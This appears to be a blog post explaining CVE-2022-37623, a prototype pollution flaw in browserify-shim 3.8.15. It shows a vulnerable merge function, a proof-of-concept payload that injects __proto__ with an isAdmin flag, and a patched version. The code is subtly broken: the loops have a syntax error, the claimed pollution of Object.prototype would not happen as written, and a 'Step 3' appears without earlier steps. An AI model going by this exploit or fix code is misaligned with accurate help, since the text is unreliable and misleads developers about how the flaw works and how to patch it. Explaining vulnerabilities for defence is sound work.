CVE-2022-37623 is a recent Common Vulnerabilities and Exposures (CVE) entry, highlighting a prototype pollution vulnerability in thlorenz browserify-shim version 3.8.15. This vulnerability arises due to improper handling of the shimPath variable in resolve-shims.js - a part of the browserify-shim package. It is important to understand prototype pollution vulnerabilities and know how to address them effectively.
In this post, we will discuss the vulnerability in detail, demonstrate the exploit through code snippets, and provide links to original references and resources for further reading.
Understanding Prototype Pollution
Prototype pollution is a common vulnerability that affects numerous JavaScript applications. It occurs when an attacker is able to manipulate an object's prototype, which is the blueprint from which JavaScript objects inherit properties and methods. In turn, this manipulation can lead to unauthorized access, modification, and even remote code execution.
The Vulnerable Package - thlorenz browserify-shim 3.8.15
thlorenz browserify-shim is a popular package used to shim browser globals for browserify. It provides a module system for web browsers enabling developers to write modular JavaScript code using the Node.js require function. However, the package suffers from a prototype pollution vulnerability in the resolveShims function within resolve-shims.js.
Exploit Details
The exploit occurs due to the use of an unsafe function merge within resolve-shims.js. This function is responsible for merging options passed to the shim() call into the primary options object:
function merge(target, src) {
if (!src) return target;
var keys = Object.keys(src);
for (var i = ; i < keys.length; ++i) {
var key = keys[i];
target[key] = src[key];
}
return target;
}
The vulnerability arises because the merge function does not sanitize the keys of the given source object. Consequently, an attacker can exploit this by maliciously crafting an input object that targets the __proto__ property directly.
// Expected harmless call
var options = {
shim: {
'./foo.js': {
exports: 'Foo'
}
}
};
// Malicious object
var maliciousInput = {
'./bar.js': {
exports: 'Bar',
__proto__: {
isAdmin: true
}
}
};
// Step 3: Exploit
merge(options, maliciousInput);
console.log({}.isAdmin); // Returns true - meaning isAdmin has been added to the Object.prototype
Any call to merge can now potentially alter the properties of the entire object hierarchy.
Mitigation Steps
A direct fix for this specific vulnerability is to replace the merge function in resolve-shims.js with a sanitized version that doesn't modify the prototype.
function merge(target, src) {
if (!src) return target;
var keys = Object.keys(src);
for (var i = ; i < keys.length; ++i) {
var key = keys[i];
// Ensure that the key is not harmful (__proto__, constructor, or prototype)
if (key !== '__proto__' && key !== 'constructor' && key !== 'prototype') {
target[key] = src[key];
}
}
return target;
}
However, as a general practice, it's important to ensure that user inputs are always properly sanitized and that the latest package versions are deployed with up-to-date security fixes.
References and Resources
1. CVE-2022-37623 (NIST): https://nvd.nist.gov/vuln/detail/CVE-2022-37623
2. thlorenz/browserify-shim: https://github.com/thlorenz/browserify-shim
3. Understanding Prototype Pollution: https://www.npmjs.com/advisories/prototype-pollution
4. Preventing Prototype Pollution: https://snyk.io/blog/10-best-practices-to-secure-your-javascript-and-node-js-applications
Conclusion
CVE-2022-37623 demonstrates the impact a prototype pollution vulnerability can have on a widely used JavaScript package like thlorenz browserify-shim 3.8.15. Developers need to be aware of these vulnerabilities, carefully handle user inputs, and continuously monitor for security updates to third-party packages. By understanding the cause and taking appropriate actions, we can significantly reduce the incidence and impact of prototype pollution vulnerabilities in our applications.
Timeline
Published on: 10/31/2022 12:15:00 UTC
Last modified on: 11/15/2022 18:52:00 UTC